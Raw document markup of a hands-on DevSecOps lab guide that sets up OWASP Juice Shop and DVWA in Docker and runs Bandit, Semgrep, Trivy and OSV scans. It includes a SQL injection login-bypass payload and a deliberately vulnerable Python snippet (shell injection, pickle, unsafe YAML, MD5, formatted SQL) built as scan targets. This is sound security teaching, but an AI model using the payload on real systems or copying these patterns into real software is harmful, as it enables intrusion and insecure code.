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0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:t>DevSecOps &amp; AI Security Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Complete Hands-On Walkthrough — Modules 1 through 3.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Every terminal command · every script · every roadblock and fix</w:t>
        <w:br/>
        <w:t>Follow this guide from zero to a complete DevSecOps pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="720"/>
      </w:pP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Mar>
              <w:top w:w="140" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>Module 1</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="E8E8E8"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Infrastructure</w:t>
              <w:br/>
              <w:t>Docker · Juice Shop · DVWA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E7D32"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>Module 2</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="E8E8E8"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SAST &amp; SCA</w:t>
              <w:br/>
              <w:t>Bandit · Semgrep · Trivy · OSV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6A1E8A"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>Module 3</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="E8E8E8"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DAST</w:t>
              <w:br/>
              <w:t>OWASP ZAP · Active Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>Module 3.5</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="E8E8E8"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>API Security</w:t>
              <w:br/>
              <w:t>crAPI · OWASP API Top 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Repo: https://github.com/akhil65/DSO  |  Last updated: 2026-03-15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>How to Use This Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This document is a literal record of every command run, every error hit, and every fix applied while building this DevSecOps lab from scratch. It is written for someone who has cloned the repo and wants to reproduce every step exactly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Conventions used throughout:</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Dark code block</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Command to type in your terminal exactly as shown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Light grey block</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Expected output — your output may differ slightly</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  ROADBLOCK</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An error we hit — read before running to avoid it</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  FIX</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The exact fix that resolved the roadblock</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFDA"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="375623"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Prerequisites:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>macOS with Homebrew · Docker Desktop · Python 3 · Git · GitHub account · 8 GB RAM minimum (16 GB recommended for running multiple containers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>Module 1 — Infrastructure &amp; Lab Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Set up the vulnerable target applications — OWASP Juice Shop and DVWA — using Docker, and configure the GitHub repository that will hold all lab artefacts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>1.1  Clone the Repo and Create Directory Structure</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git clone https://github.com/akhil65/DSO.git</w:t>
        <w:br/>
        <w:t>cd "DSO essentials"</w:t>
        <w:br/>
        <w:t>mkdir -p devsecops-lab/{module-1-infrastructure,module-2-sast,module-3-dast,docs}</w:t>
        <w:br/>
        <w:t>cd devsecops-lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>1.2  Start OWASP Juice Shop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Juice Shop is the primary target for Modules 2, 3, 3.5, 4, and 4.5.</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docker run -d -p 3000:3000 --name juice-shop bkimminich/juice-shop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Unable to find image 'bkimminich/juice-shop:latest' locally</w:t>
        <w:br/>
        <w:t>latest: Pulling from bkimminich/juice-shop</w:t>
        <w:br/>
        <w:t>...</w:t>
        <w:br/>
        <w:t>STATUS: Downloaded newer image</w:t>
        <w:br/>
        <w:t>&lt;container_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Verify it is running:</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docker ps | grep juice-shop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CONTAINER ID   IMAGE                    PORTS                    NAMES</w:t>
        <w:br/>
        <w:t>abc123def456   bkimminich/juice-shop    0.0.0.0:3000-&gt;3000/tcp   juice-shop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Open http://localhost:3000 in your browser — you should see the Juice Shop storefront.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>1.3  Start DVWA</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docker run -d -p 8080:80 --name dvwa vulnerables/web-dvwa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Open http://localhost:8080. Default credentials: admin / password. After logging in, click 'Create / Reset Database', then set Security Level to Low under DVWA Security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>1.4  First SQL Injection — Juice Shop Admin Login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Before any tooling, verify the lab works by manually bypassing the admin login. Go to http://localhost:3000/#/login and enter:</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Email:    ' OR 1=1--</w:t>
        <w:br/>
        <w:t>Password: anything</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Logged in as admin@juice-sh.op</w:t>
        <w:br/>
        <w:t>Admin dashboard accessible at /#/administration</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EAF0F8"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="2E75B6"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">What happened:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The single quote broke out of the SQL string. OR 1=1 makes the WHERE clause always true. The -- comments out the password check. This is the foundation of SQL injection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>1.5  Verify Docker Compose (used in later modules)</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docker compose version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker Compose version v2.x.x</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  ROADBLOCK — docker-compose vs docker compose:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Older installations use 'docker-compose' (hyphen). Newer Docker Desktop uses 'docker compose' (space). All commands in this guide use 'docker compose' (space). If you get 'command not found', update Docker Desktop to v4.0+ or replace 'docker compose' with 'docker-compose' throughout.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E7D32"/>
        </w:rPr>
        <w:t>Module 2 — SAST &amp; SCA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Static Application Security Testing (SAST) scans source code without running it. Software Composition Analysis (SCA) scans dependency manifests for known CVEs. Tools used: Bandit, Semgrep, Trivy, OSV Scanner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>2.1  Create the Vulnerable Python Sample App</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Navigate to the SAST module directory and create a deliberately vulnerable app for scanning:</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cd module-2-sast</w:t>
        <w:br/>
        <w:t>mkdir sample-vulnerable-app &amp;&amp; cd sample-vulnerable-app</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Create app.py with the following deliberate vulnerabilities (truncated for reference):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="595959"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  app.py (excerpt)  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Key vulnerability patterns to include:</w:t>
        <w:br/>
        <w:t>import subprocess, yaml, pickle, hashlib</w:t>
        <w:br/>
        <w:t>import sqlite3, os</w:t>
        <w:br/>
        <w:br/>
        <w:t># B602 — shell injection</w:t>
        <w:br/>
        <w:t>subprocess.call(user_input, shell=True)</w:t>
        <w:br/>
        <w:br/>
        <w:t># B301 — insecure deserialisation</w:t>
        <w:br/>
        <w:t>pickle.loads(data)</w:t>
        <w:br/>
        <w:br/>
        <w:t># B506 — yaml.load without Loader</w:t>
        <w:br/>
        <w:t>yaml.load(stream)</w:t>
        <w:br/>
        <w:br/>
        <w:t># B324 — weak hash</w:t>
        <w:br/>
        <w:t>hashlib.md5(password).hexdigest()</w:t>
        <w:br/>
        <w:br/>
        <w:t># B608 — SQL injection</w:t>
        <w:br/>
        <w:t>conn.execute(f"SELECT * FROM users WHERE id={user_id}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>2.2  Install Tools</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pip install bandit --break-system-packages</w:t>
        <w:br/>
        <w:t>pip install semgrep --break-system-packages</w:t>
        <w:br/>
        <w:t>brew install trivy</w:t>
        <w:br/>
        <w:t>brew install osv-scanner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>2.3  Run Bandit (Python SAST)</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cd module-2-sast/sample-vulnerable-app</w:t>
        <w:br/>
        <w:t>bandit -r . -f json -o bandit-report.json</w:t>
        <w:br/>
        <w:t>bandit -r . -f txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Run started: ...</w:t>
        <w:br/>
        <w:t>Test results:</w:t>
        <w:br/>
        <w:t>&gt;&gt; Issue: [B602:subprocess_popen_with_shell_equals_true]</w:t>
        <w:br/>
        <w:t xml:space="preserve">   Severity: HIGH   Confidence: HIGH</w:t>
        <w:br/>
        <w:t>&gt;&gt; Issue: [B301:pickle] Use of unsafe deserialisation</w:t>
        <w:br/>
        <w:t xml:space="preserve">   Severity: MEDIUM  Confidence: HIGH</w:t>
        <w:br/>
        <w:t>...</w:t>
        <w:br/>
        <w:t>Total issues: 29  (High: 8, Medium: 14, Low: 7)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EAF0F8"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="2E75B6"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Key insight:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bandit is Python-only. It catches OS command injection (shell=True), pickle deserialisation, weak crypto (MD5/SHA1), hardcoded passwords, and SQL injection patterns. It will NOT scan JavaScript files — that's Semgrep's job.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>2.4  Run Semgrep (Multi-language SAST)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run from the repo root to pick up both Python and JavaScript files:</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cd module-2-sast/sample-vulnerable-app</w:t>
        <w:br/>
        <w:t>semgrep --config=auto . --json -o semgrep-report.json</w:t>
        <w:br/>
        <w:t>semgrep --config=auto .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scanning 12 files...</w:t>
        <w:br/>
        <w:t>python.lang.security.audit.formatted-sql-query        HIGH</w:t>
        <w:br/>
        <w:t>javascript.express.security.audit.xss.direct-res-write HIGH</w:t>
        <w:br/>
        <w:t>python.django.security.audit.ssrf                     HIGH</w:t>
        <w:br/>
        <w:t>...</w:t>
        <w:br/>
        <w:t>Found 43 findings across 12 files</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EAF0F8"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="2E75B6"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Semgrep vs Bandit:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Semgrep found 43 findings vs Bandit's 29. Key extras: XSS via innerHTML, SSRF via requests.get(user_url), NoSQL injection, cookie misconfiguration. Semgrep does cross-language taint tracking — it follows data from source to sink.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>2.5  Run Trivy (SCA — container + dependencies)</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 Scan requirements.txt</w:t>
        <w:br/>
        <w:t xml:space="preserve">trivy fs --scanners vuln . </w:t>
        <w:br/>
        <w:br/>
        <w:t># Scan Juice Shop Docker image</w:t>
        <w:br/>
        <w:t>trivy image bkimminich/juice-shop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>requirements.txt (pip)</w:t>
        <w:br/>
        <w:t>Total: 43 (CRITICAL: 5, HIGH: 18, MEDIUM: 17, LOW: 3)</w:t>
        <w:br/>
        <w:br/>
        <w:t>bkimminich/juice-shop (debian 11)</w:t>
        <w:br/>
        <w:t>Total: 93 (CRITICAL: 8, HIGH: 31, ...)</w:t>
        <w:br/>
        <w:br/>
        <w:t>Secrets detected: 4</w:t>
        <w:br/>
        <w:t xml:space="preserve">  RSA PRIVATE KEY in /juice-shop/config/default.yml</w:t>
        <w:br/>
        <w:t xml:space="preserve">  JWT token in /juice-shop/data/static/...</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  ROADBLOCK — Trivy shows no output for requirements.txt:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>If Trivy returns 0 findings for the Python file, ensure you are scanning with '--scanners vuln' and that your requirements.txt uses pinned versions (e.g. pillow==8.2.0). Unpinned versions (pillow&gt;=8.0.0) may not match CVE records.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>2.6  Run OSV Scanner (SCA — broader database)</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osv-scanner --format json --output osv-report.json -r .</w:t>
        <w:br/>
        <w:t>osv-scanner -r .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
